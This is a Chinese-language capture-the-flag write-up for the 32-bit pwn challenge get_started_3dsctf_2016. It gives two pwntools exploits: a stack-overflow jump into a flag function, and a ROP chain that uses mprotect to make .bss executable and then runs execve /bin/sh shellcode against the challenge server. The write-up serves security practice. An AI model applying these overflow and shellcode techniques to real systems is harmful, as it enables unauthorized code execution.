题外：这道题不是很难，但是却难住了我很久。主要是在IDA中查看反编译出的伪代码时双击了一下gets（）函数，结果进入gets函数内部，我当时就懵了，误以为这是一个自定义函数，但是自定义函数应该应该不能与已有的库函数同名啊。虽然有此疑问，我没有深究，而是老老实实分析反汇编出来的伪代码，结果发现函数层层嵌套，根本分析不完。最后我不得以去网上看了别人的题解，发现根本不用管这些。题最后做出来了，但还是不明白为啥会有这么一大串代码。

----------------------------------------------------------------------------------------------------

解法一：

先分析题目的二进制文件

可以看出这是32位程序，没有看cannary和PIE保护，接下来把程序放入IDA中看看。

程序很简单，存在明显的栈溢出。细心的小伙伴还可以发现程序直接给了一个拿flag的函数，如下：

但是这个函数中有if条件限制，不好直接跳转到这个函数。这个时候就可以选择直接跳转到if语句块里，从而绕过if的检查。这么的做的弊端是导致栈不平衡，执行完这个函数后程序会崩溃，不过这之前我们已经拿到flag了，所以这题是没有什么关系的。最后exp如下：

from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

context.log_level = 'debug'

elf = ELF('./get_started_3dsctf_2016')

sh = elf.process()

get_flag = 0x080489b8

payload_01 = 'A'*0x38 + p32(get_flag)

gdb.attach(sh)

sh.sendline(payload_01)

sh.interactive('countfatcode> ')

这样写在本机上是能跑的，但是打远程的时候汇出错，我也不知道为什么。

解法二：

细心的小伙伴可以发现题目里有mprotect函数，这个函数可以改变程序内存空间的读写执行权限。具体的用法如下：

int mprotect(const void *start, size_t len, int prot);

参数start表示开始的内存地址，len是要操作的内存大小，prot表示权限

所以我们先用mrotect函数把.bss中的一部分改为可执行，用调用read函数向其中写入shellcode，最后再跳转到shellcode出执行。具体的exp如下：

from pwn import *

context(os = 'linux', arch = 'i386', log_level = 'debug')

context.terminal = ['tmux', 'splitw', '-h']

# p = process('./get_started_3dsctf_2016')

p = remote('node3.buuoj.cn', 25626)

elf = ELF('./get_started_3dsctf_2016')

mprotect_addr = 0x0806ec80

read_addr = elf.symbols['read']

pop3_addr = 0x080509a5

payload = 'A'*0x38 + p32(mprotect_addr) + p32(pop3_addr) + p32(0x080ea000) + p32(0x2000) + p32(0x7) + p32(read_addr) + p32(0x080eb000)

payload += p32(0) + p32(0x080eb000) + p32(0x100)

#gdb.attach(p)

p.sendline(payload)

sleep(1)

shellcode = asm('''

        mov edx, 0

        mov ecx, 0

        push 0x68732f

        push 0x6e69622f

        mov ebx, esp

        mov eax, 0xb

        int 0x80

''')

p.sendline(shellcode)

p.interactive()

巴特西

get_started_3dsctf_2016

解法一：

解法二：

最新文章

热门文章